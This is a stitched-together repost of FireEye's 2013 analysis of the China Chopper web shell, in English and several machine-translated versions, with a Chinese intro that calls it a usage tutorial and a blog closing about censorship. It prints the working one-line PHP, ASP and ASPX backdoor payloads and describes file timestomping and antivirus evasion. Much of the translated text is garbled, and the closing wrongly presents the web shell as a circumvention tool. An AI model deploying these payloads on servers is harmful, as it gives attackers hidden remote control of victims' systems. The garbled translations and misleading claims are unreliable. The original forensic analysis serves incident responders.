Fireeye Technical Analysis Chinese chopper - Part I

2013-08-08.
 Chinese chopper here does not refer to vegetable cooking tools, but Chinese security circles Webshell a very widely used management tool, 
please go out to buy a kitchen knife left at the east gate of the markets blacksmith king.  
Chinese chopper uses a wide range of languages, compact and practical, 
is said to be the work of a Chinese soldier retired after.  
Recently, foreign security company Fireeye on this tool a detailed analysis
we can say is a very nice tutorial chopper.

Web Shell Client:
Chinese chopper www.maicaidao.com client can be downloaded to,
  Web shell (CnC) Client MD5
 caidao.exe 5001ef50c7e869253a7c152a638eab8a 
The client uses UPX packers, there are 220 672 bytes in size, shown in Figure 1:

 Use shelling shelling tools, you can see some of the hidden details:
  C: \ Documents and Settings \ Administrator \ Desktop> upx -d 5001ef50c7e869253a7c152a638eab8a.exe -o decomp.exeUltimate Packer for eXecutablesCopyright (C) 1996 - 2011
 UPX 3.08w Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011
 File size Ratio Format Name
 -------------------- ------ ----------- -----------
 700416 <- 220672 31.51% win32 / pe decomp.exe
 Unpacked 1 file. 
Use PEID (a free testing software tools used by packers practices), we can see that the decompressed client program written in Visual C + + 6.0, shown in Figure 2:
Figure 2 PEID display program Languages.

Because the string is not encoded, so you can print out the backdoor how to communicate, we can see a url google.com.hk (Fig. 3), 
 
and a reference text Chopper (Figure 4).
Figure 3 print string refer www.google.com.hk
 Figure 4 chopper client binaries reference documentation.
Open Chinese chopper interface, we can see that the tool is a graphical interface tool, and provides add your own goals, management functions, on the client software, right-click to select "Add", enter the IP address and password and encoding, shown in Figure 5
 Figure 5: Chinese chopper client interface.
 Service end payload assembly
Chinese chopper Webshell tool is a management tool, there must be a corresponding server-side program, which supports various languages, such as ASP, ASPX, PHP, JSP, CFM, some of the official website to download the original program MD5 HASH as follows:
  Web shell Payload MD5 Hash
 Customize.aspx 8aa603ee2454da64f4c70f24cc0b5e08
 Customize.cfm ad8288227240477a95fb023551773c84
 Customize.jsp acba8115d027529763ea5c7ed6621499 
Examples are as follows:
  PHP: <? Phpeval ($ _ POST ['pass']);?>
 ASP: <% eval request ("pass")%>
 .NET: <% @ Page Language = "Jscript"%> <% eval (Request.Item ["pass"], "unsafe");%> 
In actual use, the need to replace the PASS password link time.

Features

The above brief introduction to the client and service side of the chopper China, to introduce the following additional functions under subsection tool, Chinese chopper contains a "security scan" function, an attacker can use crawlers or brute force to attack the target site, as shown below:

 In addition to discovering vulnerabilities addition, China's most powerful than the chopper management capabilities, and include the following:
  1, File Management (File Explorer)
 2, database management (DB client)
 3, virtual terminal (command line) 
In Chinese chopper client interface, right-click an object can view the list of features, as shown:

 Documents Management
Chinese chopper as a remote access tool (RAT), contains a common upload, download, edit, delete, copy, rename, and change the time stamp of the file. Figure 8:

 Modify the file functionality is now common webshell took the function, Figure 9 shows the three files test directory, because Windows Explorer shows only the "modified date" field, so under normal circumstances, be able to hide the purpose of the operation:

 Use tools to modify the same two other documents, in Figure 10, you can see a consistent modified date of the file and the other two files, if not a professional person, generally do not see the difference between these files:

 After the creation date, and modification date of a file is modified, to identify abnormal files are very cumbersome, need to be analyzed as well as the Master File Table MFT FTK, fireeye recommend using tools mftdump to analyze, the tool can extract the file metadata for analysis.
The following table shows the extract from the MFT Webshell timestamp attention "fn *" field contains the file of the original time.
  Category Pre-touch match Post-touch match
 siCreateTime (UTC) 6/6/2013 16:01 2/21/2003 22:48
 siAccessTime (UTC) 6/20/2013 1:41 6/25/2013 18:56
 siModTime (UTC) 6/7/2013 0:33 2/21/2003 22:48
 siMFTModTime (UTC) 6/20/2013 1:54 6/25/2013 18:56
 fnCreateTime (UTC) 6/6/2013 16:01 6/6/2013 16:01
 fnAccessTime (UTC) 6/6/2013 16:03 6/6/2013 16:03
 fnModTime (UTC) 6/4/2013 15:42 6/4/2013 15:42
 fnMFTModTime (UTC) 6/6/2013 16:04 6/6/2013 16:04 

Database Management
Chinese chopper supports a variety of databases, such as MYSQL, MSSQL, ORACLE, INFOMIX, ACCESS, etc., database interface, built-in some common database statements that can automatically display the table names, column names, the query, and built a common database statement . Figure 11 below:

 After linking, choppers provide some common database statement, 12:

 Command line functionality
Finally, knives provides a command line interface that can be operated via a command line shell system-level interaction, of course, inherited permissions are permissions WEB applications. Figure 13:

 Payload property
In addition to the above features, Chinese chopper can be widely used in hacker circles, as well as the following factors:

  1, size 2, the server 3 content, client content 4, whether to kill Free 
<br /> Chinese chopper size server-side script is very small, is a typical sentence Trojans, which aspx server software only 73 bytes, shown in Figure 14, 

compared to other conventional webshell see its advantages.

Server content
Chinese chopper server-side code in addition to the simple, and supports a variety of encryption, encoding, below is aspx server-side code,

Client Content

Without any client-side code in the browser, as shown in Figure 16:
 
 Anti-virus software to detect:

Most anti-virus software can not detect the tool. As shown below:
 
 
 fireeye communication mechanism that will detail the interaction mechanism Chinese chopper in the second section of the book and so on.
 
ps: small series have been translated article moved to shed tears, this should be the knife since the network is the most detailed of a tutorial, and I believe the chopper author of this article will be gratified to see, so many years, finally made ​​it!

lock
Certified On Level: 6 Join Date: July 3, 2013


===== 

Breaking Down the China Chopper Web Shell - Part I


Part I in a two-part series.
China Chopper: The Little Malware That Could
China Chopper is a slick little web shell that does not get enough exposure and credit for its stealth. Other than a good blog post from security researcher Keith Tyler, we could find little useful information on China Chopper when we ran across it during an incident response engagement. So to contribute something new to the public knowledge base — especially for those who happen to find the China Chopper server-side payload on one of their Web servers — we studied the components, capabilities, payload attributes, and the detection rate of this 4 kilobyte menace.
Components
China Chopper is a fairly simple backdoor in terms of components. It has two key components:the Web shell command-and-control (CnC) client binary and a text-based Web shell payload (server component). The text-based payload is so simple and short that an attacker could type it by hand right on the target server — no file transfer needed.

Web Shell Client

The Web shell client used to be available on www.maicaidao.com, but we would advise against visiting that site now.
Web shell (CnC) Client MD5 Hash
caidao.exe 5001ef50c7e869253a7c152a638eab8a
The client binary is packed with UPX and is 220,672 bytes in size, as shown in Figure 1.
Client binary viewed in WinHex
Figure 1: Client binary viewed in WinHex
Using the executable file compressor UPX to unpack the binary allows us to see some of the details that were hidden by the packer.
C:\Documents and Settings\Administrator\Desktop>upx -d
5001ef50c7e869253a7c152a638eab8a.exe -o decomp.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08w       Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011
File size         Ratio      Format      Name
--------------------   ------   -----------   -----------
700416 <-    220672   31.51%    win32/pe     decomp.exe
Unpacked 1 file.
Using PEiD (a free tool for detecting packers, cryptors and compilers found in PE executable files), we see that the unpacked client binary was written in Microsoft Visual C++ 6.0, as shown in Figure 2.
image002
Figure 2: PEiD reveals that the binary was written using Visual C++ 6.0
Because the strings are not encoded, examining the printable strings in the unpacked binary provides insight into how the backdoor communicates. We were intrigued to see a reference to google.com.hk using the Chinese (simplified) language parameter (Figure 3) as well as references to the text “Chopper" (Figure 4).
image003
Figure 3: Printable strings refer to www.google.com.hk
image004
Figure 4: References to Chopper in the client binary
So we have highlighted some attributes of the client binary. But what does it look like in use? China Chopper is a menu-driven GUI full of convenient attack and victim-management features. Upon opening the client, you see example shell entries that point to www.maicaidao.com, which originally hosted components of the Web shell.
To add your own target, right click within the client, select “Add” and enter the target IP address, password, and encoding as shown in Figure 5.
image005
Figure 5: Picture of the China Chopper Web shell client binary

Server-side Payload Component

But the client is only half of the remote access tool — and not likely the part you would find on your network. Its communication relies on a payload in the form of a small Web application. This payload is available in a variety of languages such as ASP, ASPX, PHP, JSP, and CFM. Some of the original files that were available for download are shown with their MD5 hashes:
Web shell Payload MD5 Hash
Customize.aspx 8aa603ee2454da64f4c70f24cc0b5e08
Customize.cfm ad8288227240477a95fb023551773c84
Customize.jsp acba8115d027529763ea5c7ed6621499
Source:  http://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html
Even though the MD5s are useful, keep in mind that this is a text-based payload that can be easily changed, resulting in a new MD5 hash. We will discuss the payload attributes later, but here is an example of just one of the text-based payloads:
ASPX:
 <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>
Note that “password” would be replaced with the actual password to be used in the client component when connecting to the Web shell.
In the next post, we provide regular expressions that can be used to find instances of this Web shell.

Capabilities

The capabilities of both the payload and the client are impressive considering their size.  The Web shell client contains a “Security Scan” feature, independent of the payload, which gives the attacker the ability to spider and use brute force password guessing against authentication portals.
image006
Figure 6: China Chopper provides a “Security Scan” feature
In addition to vulnerability hunting, this Web shell has excellent CnC features when combining the client and payload, include the following:
  • File Management (File explorer)
  • Database Management (DB client)
  • Virtual Terminal (Command shell)
In China Chopper's main window, right-clicking one of the target URLs brings up a list of possible actions (see Figure 7).
image007
Figure 7: Screenshot of the CnC client showing capabilities of the Web shell

File Management

Used as a remote access tool (RAT), China Chopper makes file management simple.  Abilities include uploading and downloading files to and from the victim, using the file-retrieval tool wget to download files from the Web to the target, editing, deleting, copying, renaming, and even changing the timestamp of the files.
image008
Figure 8: File Management provides an easy to use menu that is activated by right-clicking on a file name
So just how stealthy is the “Modify the file time” option? Figure 9 shows the timestamps of the three files in the test directory before the Web shell modifies the timestamps. By default, Windows Explorer shows only the “Date Modified” field. So normally, our Web shell easily stands out because it is newer than the other two files.
image009
Figure 9: IIS directory showing time stamps prior to the time modification
Figure 10 shows the date of the file after the Web shell modifies the timestamp. The modified time on our Web shell shows up as the same as the other two files. Because this is the default field displayed to users, it easily blends in to the untrained eye — especially with many files in the directory.
image010
Figure 10: IIS directory showing time stamps after the time modification
Clever investigators may think that they can spot the suspicious file due to the creation date being changed to the same date as the modified date. But this is not necessarily anomalous. Additionally, even if the file is detected, the forensic timeline would be skewed because the date that the attacker planted the file is no longer present. To find the real date the file was planted, you need to go to the Master File Table (MFT). After acquiring the MFT using FTK, EnCase, or other means, we recommend using mftdump (available from http://malware-hunters.net/all-downloads/). Written by FireEye researcher Mike Spohn, mftdump is a great tool for extracting and analyzing file metadata.
The following table shows the timestamps pulled from the MFT for our Web shell file. We pulled the timestamps before and after the timestamps were modified. Notice that the “fn*” fields retain their original times, thus all is not lost for the investigator!
Category Pre-touch match Post-touch match
siCreateTime (UTC) 6/6/2013 16:01 2/21/2003 22:48
siAccessTime (UTC) 6/20/2013 1:41 6/25/2013 18:56
siModTime (UTC) 6/7/2013 0:33 2/21/2003 22:48
siMFTModTime (UTC) 6/20/2013 1:54 6/25/2013 18:56
fnCreateTime (UTC) 6/6/2013 16:01 6/6/2013 16:01
fnAccessTime (UTC) 6/6/2013 16:03 6/6/2013 16:03
fnModTime (UTC) 6/4/2013 15:42 6/4/2013 15:42
fnMFTModTime (UTC) 6/6/2013 16:04 6/6/2013 16:04

Database Management

The Database Management functionality is impressive and helpful to the first-time user.  Upon configuring the client, China Chopper provides example connection syntax.
image011
Figure 11: Database Management requires simple configuration parameters to connect
After connecting, China Chopper also provides helpful SQL commands that you may want to run.
image012
Figure 12: Database Management provides the ability to interact with a database and even provides helpful prepopulated commands

Command Shell Access

Finally, command shell access is provided for that OS level interaction you crave. What a versatile little Web shell!
image013
Figure 13: Virtual Terminal provides a command shell for OS interaction

Payload Attributes

We stated above that this backdoor is stealthy due to a number of factors including the following:
  • Size
  • Server-side content
  • Client-side content
  • AV detection rate

Size

Legitimate and illegitimate software usually suffer from the same principle: more features equals more code, which equals larger size. Considering how many features this Web shell contains, it is incredibly small — just 73 bytes for the aspx version, or 4 kilobytes on disk (see Figure 14). Compare that to other Web shells such as Laudanum (619 bytes) or RedTeam Pentesting (8,527 bytes). China Chopper is so small and simple that you could conceivably type the contents of the shell by hand.
 image014
Figure 14: China Chopper file properties

Server-Side Content

The server side content could easily be overlooked among the other files associated with a vanilla install of a complex application. The code does not look too evil in nature, but is curious.
image015
Figure 15: The content of the file seems relatively benign, especially if you add a warm and fuzzy word like Security as the shell password
Below are the contents of the Web shell for two of its varieties.
ASPX:


 <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>







PHP:


 <?php @eval($_POST['password']);?>







Client-Side Content

Because all of the code is server-side language that does not generate any client-side code, browsing to the Web shell and viewing the source as a client reveals nothing.
image016
Figure 16: Viewing the source of the web shell reveals nothing to the client

Anti-virus Detection Rate

Running the Web shell through the virus-scanning website No Virus Thanks shows a detection rate of 0 out of 14, indicating that most, if not all, anti-virus tools would miss the Web shell on an infected system.
image017
Figure 17: Results of multiple anti-virus engine inspections showing China Chopper coming up clean
The same holds true for VirusTotal. None of its 47 anti-virus engines flags China Chopper as malicious.
image018
Figure 18: Results of multiple AV engine inspections showing the Web shell comes up clean

Conclusion

We hope that this post has advanced the understanding of this compact, flexible, and stealthy Web shell. If you are reading this, you may be facing China Chopper right now — if so, we wish you success in eradicating this pest. In Part II, we examine the platform China Chopper runs on and describe its delivery mechanisms, traffic analysis and detection.


 ==========
 http://www.freebuf.com/articles/web/11687.html

Fireeye技术剖析中国菜刀 – Part I

2013-08-08. 这里的中国菜刀不是指切菜做饭的工具,而是中国安全圈内使用非常广泛的一款 Webshell管理工具,想买菜刀请出门左拐东门菜市场王铁匠处。中国菜刀用途十分广泛,支持多种语言,小巧实用,据说是一位中国军人退伍之后的作品。 日前,国外安全公司Fireeye对这款工具进行了详细的剖析,可以说是一部非常nice的菜刀使用教程。

中国菜刀的客户端可在www.maicaidao.com下载到,
Web shell (CnC) Client        MD5
caidao.exe                    5001ef50c7e869253a7c152a638eab8a
客户端使用UPX加壳,有220672个字节大小,如图1所示:

 图1,使用WinHex工具查看.

使用脱壳工具脱壳,可以看到一些隐藏的细节:
C:\Documents and Settings\Administrator\Desktop>upx -d 5001ef50c7e869253a7c152a638eab8a.exe -o decomp.exeUltimate Packer for eXecutablesCopyright (C) 1996 - 2011
UPX 3.08w       Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011
File size         Ratio      Format      Name
--------------------   ------   -----------   -----------
700416 <-    220672   31.51%    win32/pe     decomp.exe
Unpacked 1 file.
使用PEID(一个免费检测软件使用的加壳手法的工具),我们可以看到解压缩后的客户端程序使用Visual C + + 6.0编写,如图2所示:
图2 PEID显示程序所用语言

因为字符串没有进行编码,所以可以通过打印输出该后门如何通信,我们可以看到一个url google.com.hk(图3),以及参考文本Chopper(图4)
图3 打印字符串refer www.google.com.hk
图4 菜刀的客户端二进制文件参考文档
打开中国菜刀界面,我们可以看到该工具是一款图形界面工具,并且提供了添加自己的目标、管理的功能,在客户端软件上,右键单击选择“添加”,输入IP地址,以及密码和编码方式,如图5所示
图5:中国菜刀客户端界面

服务端payload组件
中国菜刀的工具是一款Webshell管理工具,相应必然有一个服务端的程序,它支持各种语言,如ASP、ASPX、PHP、JSP、CFM,一些官网下载原始程序MD5 HASH如下:
Web shell Payload MD5 Hash
Customize.aspx 8aa603ee2454da64f4c70f24cc0b5e08
Customize.cfm ad8288227240477a95fb023551773c84
Customize.jsp acba8115d027529763ea5c7ed6621499
例子如下:
PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request("pass")%>
.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
在实际使用过程中,替换PASS为链接的时候需要的密码。

功能

上面简单介绍了中国菜刀的客户端和服务端的,下面来介绍下该款工具的其他功能,中国菜刀包含了“安全扫描”功能,攻击者能够使用爬虫或暴力破解来攻击目标站点,如下图:
在除了发现漏洞之外,中国菜刀最强大的莫过于管理功能了,包含以下内容:
1、文件管理(文件资源管理器)
2、数据库管理(DB客户端)
3、虚拟终端(命令行)
在中国菜刀的客户端界面中,右键单击一个目标可以查看相应的功能列表,如图7:
文件管理
中国菜刀作为一个远程访问工具(RAT),包含了常见的上传、下载、编辑、删除、复制、重命名以及改变文件的时间戳。如图8:
修改文件功能现在常见的webshell就带了该功能,图9显示了测试目录的三个文件,因为Windows资源管理器只显示“修改日期”字段,所以通常情况下,能够达到隐藏操作的目的:
使用工具将文件修改和其他两个文件相同,如图10,可以看到文件的修改的日期和其他两个文件一致,如果不是专业的人士,一般不会看出这几个文件的区别:
当文件的创建日期和修改日期被修改之后,查出异常文件非常麻烦,需要分析主文件表MFT以及FTK,fireeye建议使用工具mftdump来进行分析,该工具能够提取文件元数据进行分析。
下表显示了从MFT中提取的Webshell时间戳,注意"fn*"字段包含了文件的原始时间。
Category            Pre-touch match Post-touch match
siCreateTime (UTC) 6/6/2013 16:01 2/21/2003 22:48
siAccessTime (UTC) 6/20/2013 1:41 6/25/2013 18:56
siModTime (UTC) 6/7/2013 0:33 2/21/2003 22:48
siMFTModTime (UTC) 6/20/2013 1:54 6/25/2013 18:56
fnCreateTime (UTC) 6/6/2013 16:01 6/6/2013 16:01
fnAccessTime (UTC) 6/6/2013 16:03 6/6/2013 16:03
fnModTime (UTC) 6/4/2013 15:42 6/4/2013 15:42
fnMFTModTime (UTC) 6/6/2013 16:04 6/6/2013 16:04

数据库管理
中国菜刀支持各种数据库,如MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等,数据库操作界面,内置了一些常用的数据库语句,能够自动显示表名、列名,查询语句,并且内置了常用的数据库语句。如下图11:
链接之后,菜刀提供了一些常见的数据库语句,如图12:
命令行功能
最后,菜刀提供了一个命令行界面,能够通过命令行shell进行操作系统级别的互动,当然继承的权限是WEB应用的权限。如图13:

Payload属性
除了以上的功能之外,中国菜刀的能够在黑客圈广泛使用,还有以下几个因素:

1、大小
2、服务端内容
3、客户端内容
4、是否免杀
大小
中国菜刀的服务端脚本非常小,是典型的一句话木马,其中aspx服务端软件只有73字节,见图14,相比其他传统的webshell可见它的优越性。

服务端内容
中国菜刀的服务端代码除了简洁之外,并且支持多种加密、编码,下图是aspx的服务端代码,

客户端内容

在浏览器不会产生任何客户端代码,如图16:


杀毒软件检测:

大多数杀毒软件不能检测出该工具。如下图:
fireeye表示将在第二部分内容中详细介绍中国菜刀的通讯机制、交互机制等。

ps:小编翻译完本文流下了感动的泪水,这应该是菜刀自网络出现之后最详细的一篇使用教程了,相信菜刀作者看到本文也会感到欣慰,这么多年了,终于出头了!

lock
40篇文章等级:6
独立安全研究员

 =====

打破中國砍刀網站殼牌 - 第一部分

 第一部分在兩部分組成的系列。
中國牛刀:小小惡意軟件可能
中國砍刀是一個漂亮的小網站的外殼,沒有得到足夠的曝光量和信貸為它的隱身。 除了 ​​一個很好的博客文章由安全研究人員基思·泰勒,我們可以發現在中國砍刀小有用的信息,當我們在事件響應參與跑過它。 因此,要促進新的東西給公眾的知識基礎 - 特別是對那些誰碰巧發現在他們的Web服務器之一的中國斬波服務器端的有效載荷 - 我們所研究的成分,性能,有效載荷屬性,而這4千字節的檢出率威脅。
組件
中國菜刀在組件方面相當簡單的後門。 它有兩個關鍵部分:網絡shell命令和控制(CNC)客戶端二進制和基於文本的網頁殼的有效載荷(服務器組件)。 基於文本的有效載荷是如此的簡單和短期的攻擊者可以通過手動輸入正確目標服務器上 - 不需要的文件傳輸。

網站殼客戶端

該網站殼客戶端使用的是可在www.maicaidao.com,但我們會建議對目前訪問該網站。
網絡殼(CNC)客戶端 MD5哈希
caidao.exe 5001ef50c7e869253a7c152a638eab8a
客戶機二進制擠滿UPX和是220672字節大小,如圖1。
在WinHex的客戶端二進制觀看
圖1:在WinHex的客戶端二進制觀看
使用可執行文件UPX壓縮解壓二進制讓我們看到了一些被隱藏的封隔器的詳細信息。
 C:\ Documents和Settings \管理員\桌面> UPX -d
 5001ef50c7e869253a7c152a638eab8a.exe -o DECOMP.EXE
終極封隔器可執行文件
版權所有(C)1996  -  2012
 UPX3.08瓦特馬庫斯Oberhumer,拉斯洛莫爾納和約翰·賴澤2011年12月12號
文件大小比例格式名稱
 -------------------- ------ ----------- -----------
 700416 < -  220672 31.51%的Win32 / PE DECOMP.EXE
解壓縮後的1個文件。
使用PEID(一個免費的工具,​​用於檢測加殼,cryptors和編譯器的PE可執行文件中找到),我們​​可以看到,解壓後的客戶端二進制寫在Microsoft Visual C ++ 6.0,如圖2。
image002
圖2:PEID顯示,二是用編寫的Visual C ++ 6.0
因為字符串不編碼,檢查打印的字符串中的解包二進制提供了深入了解的後門通信。 我們都好奇,看看參考使用中國(簡體)語言參數(圖3),以及參考文本“牛刀”(圖4)到Google.com.hk。
image003
圖3:打印字符串指www.google.com.hk
image004
圖4:引用砍刀在客戶端二進制
因此,我們強調了客戶端二進制文件的一些屬性。 但什麼是它看起來像在使用? 中國砍刀是一個菜單驅動界面充滿了方便攻擊和受害者管理功能。 一旦打開客戶端,您可以看到指向www.maicaidao.com例如外殼條目,原本主辦的網站殼組件。
要添加自己的目標,右邊的客戶端中單擊,選擇“添加”,輸入目標IP地址,密碼和編碼,如圖5。
image005
圖5:圖片中國砍刀網站殼客戶端二進制

服務器端有效載荷分量

但是,客戶端只有一半的遠程訪問工具 - 並不太可能的部分,你會發現你的網絡上。 它的通信依賴於一個小型Web應用程序的形式的有效載荷。 這個有效負載是在各種語言,如ASP,ASPX,PHP,JSP和CFM提供。 一些原始文件是可下載並帶有它們的MD5哈希值:
網絡外殼有效載荷 MD5哈希
Customize.aspx 8aa603ee2454da64f4c70f24cc0b5e08
Customize.cfm ad8288227240477a95fb023551773c84
Customize.jsp acba8115d027529763ea5c7ed6621499
資料來源:http://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html
即使MD5s是有用的,記住這是可以容易地改變,從而產生一種新的MD5哈希基於文本的有效載荷。 我們將討論後的有效載荷屬性,但這裡只是基於文本的有效載荷的一個例子:
ASPX:
  <%@頁面語言=“JScript中,”%> <%的eval(Request.Item [“密碼”],“不安全”);%>
注意,“密碼”將被替換為在客戶端組件連接到Web殼時所使用的實際的密碼。
在接下來的文章中,我們提供的正則表達式,可以用來找到這個網頁外殼的實例。

能力

既有效載荷和客戶端的能力是令人印象深刻的考慮它們的大小。 該網站殼客戶端包含了“安全掃描”功能,獨立的有效載荷,這給攻擊者蜘蛛用蠻力猜測密碼對認證門戶網站的能力。
image006
圖6:中國砍刀提供了“安全掃描”功能
除了漏洞打獵,此網站的外殼相結合時,在客戶端和有效載荷,包括以下具有優良的數控功能:
  • 文件管理(文件瀏覽器)
  • 數據庫管理(DB客戶端)
  • 虛擬終端(命令行解釋器)
在中國斬波器的主窗口中,用鼠標右鍵單擊目標URL之一帶來了可能採取的行動(見圖7)的列表。
image007
圖7:數控客戶端顯示的網頁殼的功能截圖

文件管理

作為遠程訪問工具(RAT),中國砍刀使得文件管理變得簡單。 功能包括上傳和下載文件,並從被害人,使用文件檢索工具wget來從網上下載文件到目標,編輯,刪除,複製,重命名,甚至改變文件的時間戳。
image008
圖8:文件管理提供了一個易於使用的菜單由右鍵點擊一個文件名啟動
那麼到底有多隱形​​的“修改文件的時間”選項? 圖9顯示在測試目錄中的三個文件的時間戳的網頁殼修改時間戳之前。 默認情況下,Windows資源管理器只顯示“修改日期”字段。 所以通常情況下,我們的網殼很容易脫穎而出,因為它比其他兩個文件更新。
image009
圖9:以前IIS目錄顯示時間戳的時間修改
圖10顯示了Web殼修改的時間戳之後的文件的日期。 在我們的Web殼的修改的時間顯示為相同的其它兩個文件。 因為這是顯示給用戶的默認領域,很容易融合到未經訓練的眼睛 - 尤其是與目錄中的很多文件。
image010
圖10:IIS目錄顯示時間戳時間修改後
聰明的調查人員可能認為他們可以發現可疑文件,因為創建日期被更改為相同的日期作為修改日期。 但是,這不一定反常。 此外,即使在檢測到文件,法醫的時間表將是偏斜,因為攻擊者種植該文件的日期是不再存在。 為了找到真正的約會文件種植,你需要去到主文件表(MFT)。 使用FTK,包住,或其他手段獲取MFT後,我們建議使用mftdump(可從http://malware-hunters.net/all-downloads/)。 撰稿FireEye的研究員邁克SPOHN,mftdump是提取和分析文件元數據的強大工具。
下表顯示了從MFT的拉我們的Web殼文件的時間戳。 我們之前和時間戳進行了修改後,拉著時間戳。 請注意,“FN *”的字段保留其原有的時間,因此沒有失去一切的調查!
分類 預觸控比賽 後觸摸匹配
2013年6月6日16:01 2003年2月21日22:48
2013年6月20號1:41 2013年6月25日18:56
2013年6月7日0:33 2003年2月21日22:48
2013年6月20號1:54 2013年6月25日18:56
2013年6月6日16:01 2013年6月6日16:01
2013年6月6日16:03 2013年6月6日16:03
2013年6月4日15:42 2013年6月4日15:42
2013年6月6日16:04 2013年6月6日16:04

數據庫管理

數據庫管理功能令人印象深刻的和有益的初次使用者。 當配置客戶端,中國砍刀提供例如連接語法。
image011
圖11:數據庫管理需要簡單的配置參數進行連接
連接後,中國砍刀還提供了您可能需要運行有幫助的SQL命令。
image012
圖12:數據庫管理提供與數據庫交互的能力,甚至還提供了有用的預先填充命令

命令外殼訪問

最後,命令shell訪問提供了你所渴望的操作系統級別的互動。 什麼是多才多藝的小網站的外殼!
image013
圖13:虛擬終端提供了一個命令shell為操作系統交互

有效載荷屬性

我們如上所述,這個後門是隱形由於多種因素,其中包括以下內容:
  • 尺寸
  • 服務器端內容
  • 客戶端內容
  • AV檢測率

尺寸

合法和非法軟件通常遭受同樣的原則:更多的功能意味著更多的代碼,這等於更大的尺寸。 考慮到有多少功能,此Web殼含有,這是令人難以置信的小 - 只有73個字節的ASPX版本,或4千字節磁盤上(見圖14)。 相比之下,其他的Web Shell如鴉片酊(619字節)或RedTeam滲透測試(8527字節)。 中國斬波器是如此之小而簡單,你可以想像的手型,外殼的內容。
  image014
圖14:中國菜刀文件屬性

服務器端內容

服務器端的內容可以很容易地與香草相關的其他文件中忽略了安裝複雜的應用程序。 該代碼看起來不是太邪惡性的,而是好奇。
image015
圖15:文件的內容顯得比較溫和,特別是如果你添加一個溫暖和模糊的字一樣安全作為外殼的密碼
下面是Web殼的兩個其品種的內容。
ASPX:
   <%@頁面語言=“JScript中,”%> <%的eval(Request.Item [“密碼”],“不安全”);%> 





PHP:
   <?php的@eval($ _ POST ['密碼']);?> 





客戶端內容

因為所有的代碼都是服務器端語言不產生任何客戶端代碼,瀏覽到Web Shell查看源作為客戶端發現什麼都沒有。
image016
圖16:查看網殼的來源沒有透露給客戶端

反病毒檢測率

運行Web外殼經過病毒掃描的網站沒有病毒由於顯示的檢出率為0出14,這表明大多數,如果不是全部,反病毒工具將錯過網絡外殼被感染的系統上。
image017
圖17:多種反病毒引擎檢查顯示中國砍刀來了乾淨的結果
對於VirusTotal同樣適用。 無其47反病毒引擎標誌中國砍刀為惡意的。
image018
圖18:多個殺毒引擎的檢查顯示網頁外殼結果大作乾淨

結論

我們希望這個帖子有先進這款小巧,靈活,隱身網絡外殼的理解。 如果你正在讀這篇文章,你可能會面臨中國砍刀現在 - 如果是這樣,我們祝你在根除這種害蟲的成功。 在第二部分中,我們考察了中國砍刀的運行平台,並描述其執行機制,流量分析和檢測。


 ===========

 Seek knowledge are regardless of geography,
Different countries have different cultures,
We are the same human beings, we live under the same sky.

 p@r@dox17 Humans are only  two species= good guys and bad guys.
And not because different countries, different color, different religion, different classes,
Different educational / experience, different languages​​..etc.,
The resulting peoples to communicate obstacle for  .


Knowledge / experience to enrich our lives,
In the free sky,
We explore / seeking, it is realistic and networks environment,
This is the right of everyone should enjoy.

Only communist dictator are closing their peoples seeking knowledge,
Communist dictator violent beast are being afraid of their peoples overthrown their regime of !

Enjoyment of human rights we were born down,
In 2015, advances in information technology,
We hope more people can seeking blocked information / knowledge,
And hope more people can also use a wide range of Google great God,
Enjoy A taste of the rich colors of life!

Finally, please caution this 'Chinese chopper' to overthrown the wall,
Also wish that Download to be continue ..and sharing,
Also expect more technical elite manufacturer developed a little more than circumvention tools / VPN / TOR..
Let people around the world can also visit internet over of the wall of knowledge,
Boundless beneficence~

Thank you for more people of technology sharing!
Melody.Blog Sincerely Thanksgiving~

===

尋求知識不分地域,
不同國家有著不同文化的差異,
同樣是人類,我們生活在同一天空下.

 p@r@dox17 人類只有好人和壞人的分別.
並不會因為不同國渡,不同膚色,不同宗教,不同階級,
不同學歷/見識,不同語言..等.,
而造成人們交流溝通的障礙.


知識/見識豐富我們的生活,
在自由天空下,
我們在探索/尋求的時侯,不被遮蔽網絡和現實環境中,
這是每一個人應該享有的權利.

只有共產主義封閉的獨裁專制者,
害怕被人民推翻牠們的暴力畜牲政權!

享有人權是我們出生下來的權利,
在2015年資訊科技發達,
希望更多被封鎖資訊/知識的人們,
也可使用多元化的谷歌大神,
領略豐富生活的色彩!

最後,請各位慎用這'中國菜刀'來翻牆,
也希望延續下載點..
亦期望更多技術尖子開發多一點翻牆工具/VPN/TOR..
讓世界各地的人們也可探視牆外的知識,
功德無量~

在此感謝各位的技術分享!
Melody.Blog感恩 敬上~

===

 p@r@dox17 Suchen Wissen sind unabhängig von Geographie,
Unterschiedliche Länder haben unterschiedliche Kulturen,
Wir sind die gleichen Menschen, die wir unter dem gleichen Himmel leben.


Menschen sind nur zwei Arten = gut und Böse.
Und nicht, weil verschiedene Länder, andere Farbe, andere Religion, verschiedenen Klassen,
Verschiedenen Bildungs ​​/ Erfahrung, verschiedene Sprachen .etc.,
Die resultierenden Völker Hindernis für die Kommunikation.


Wissen / Erfahrung, um unser Leben zu bereichern,
In dem freien Himmel,
Wir erforschen / sucht, ist es realistisch und Netze Umwelt,
Dies ist das Recht eines jeden Menschen sollte zu genießen.

Nur kommunistische Diktator werden ihre Völker der Suche nach Wissen zu schließen,
Kommunistische Diktator heftige Tier werden, Angst vor ihrer Völker gestürzt ihre Regime!

Genuss der Menschenrechte wir hinunter geboren wurden,
Im Jahr 2015 Fortschritte in der Informationstechnologie,
Wir hoffen, dass mehr Menschen blockierten Informationen / Wissen sucht,
Und hoffen, dass mehr Menschen können auch eine breite Palette von Google großen Gott zu verwenden,
Genießen Sie einen Eindruck von der reichen Farben des Lebens!

Schließlich bitte Vorsicht Dieses 'Chinese Chopper' gestürzt der Wand,
Möchten auch, dass herunterladen ..und Sharing weiterhin werden,
